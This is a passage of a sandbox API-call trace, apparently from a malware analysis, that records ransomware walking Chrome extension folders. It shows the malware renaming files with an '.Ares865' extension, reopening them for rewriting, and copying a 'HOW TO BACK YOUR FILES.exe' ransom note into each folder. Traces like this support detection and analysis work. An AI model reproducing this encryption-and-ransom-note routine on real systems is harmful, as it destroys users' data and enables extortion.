ftCreationTime.dwLowDateTime=0x84062460, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaa8b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaa8b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.469] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.469] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.469] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.469] lstrlenW (lpString="messages.json") returned 13 [0102.469] lstrlenW (lpString="Ares865") returned 7 [0102.469] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.469] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.Ares865") returned 160 [0102.469] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.471] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=229) returned 1 [0102.474] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg" [0102.474] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg" [0102.475] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.475] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.475] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.475] GetLastError () returned 0x0 [0102.476] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.476] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x840512f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaa8b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaa8b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.476] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.476] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.476] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.476] lstrlenW (lpString="messages.json") returned 13 [0102.476] lstrlenW (lpString="Ares865") returned 7 [0102.476] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.476] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.Ares865") returned 160 [0102.476] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.478] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=303) returned 1 [0102.481] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar" [0102.481] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar" [0102.481] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.481] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.482] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.482] GetLastError () returned 0x0 [0102.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.482] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84036540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaceca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaceca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.483] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.483] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.483] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.483] lstrlenW (lpString="messages.json") returned 13 [0102.483] lstrlenW (lpString="Ares865") returned 7 [0102.483] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.483] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.Ares865") returned 160 [0102.483] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.484] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.485] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0102.487] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo" [0102.488] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo" [0102.488] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.488] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.488] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.489] GetLastError () returned 0x0 [0102.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81a42ff0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaceca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaceca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.489] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.489] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.489] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="4.2.8_0" | out: lpString1="4.2.8_0") returned="4.2.8_0" [0102.489] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0" [0102.489] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0" [0102.489] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.490] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.490] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.490] GetLastError () returned 0x0 [0102.491] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eaf4e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eaf4e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.491] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.491] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.491] lstrcpyW (in: lpString1=0x2cce502, lpString2="128.png" | out: lpString1="128.png") returned="128.png" [0102.491] lstrlenW (lpString="128.png") returned 7 [0102.491] lstrlenW (lpString="Ares865") returned 7 [0102.491] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.Ares865") returned 144 [0102.491] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.ares865"), dwFlags=0x1) returned 1 [0102.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3406) returned 1 [0102.498] lstrcpyW (in: lpString1=0x2cce502, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0102.498] lstrlenW (lpString="manifest.json") returned 13 [0102.498] lstrlenW (lpString="Ares865") returned 7 [0102.498] lstrcmpiW (lpString1="st.json", lpString2="Ares865") returned 1 [0102.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.Ares865") returned 150 [0102.498] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0102.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.500] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=728) returned 1 [0102.504] lstrcpyW (in: lpString1=0x2cce502, lpString2="_locales" | out: lpString1="_locales") returned="_locales" [0102.504] lstrcpyW (in: lpString1=0x2cce502, lpString2="_metadata" | out: lpString1="_metadata") returned="_metadata" [0102.504] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata" [0102.504] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata" [0102.504] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.505] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.505] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.505] GetLastError () returned 0x0 [0102.506] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.506] FindFirstFileW (in: 